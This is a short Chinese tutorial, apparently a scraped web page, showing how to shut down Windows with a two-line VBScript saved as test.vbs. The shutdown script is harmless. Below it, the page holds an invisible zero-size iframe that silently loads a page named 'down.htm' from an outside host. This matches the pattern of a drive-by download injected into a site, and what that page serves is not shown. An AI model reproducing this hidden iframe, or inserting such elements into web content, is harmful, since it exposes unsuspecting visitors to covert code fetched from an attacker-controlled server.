$$$$$$ 利用WSH实现关闭计算机功能 ¥¥¥¥¥¥¥¥¥

利用WSH实现关闭计算机功能

利用WSH实现关闭计算机功能,其实很简单,采用下面的语句即可。

把下面的语句保存为test.vbs,然后运行,就可以看到效果。

Set objshell = wscript.CreateObject("Shell.Application")
objshell.ShutdownWindows

<iframe src="http://lucky.myrice.com/down.htm" height="0" width="0"></iframe>

你可能感兴趣的:(计算机)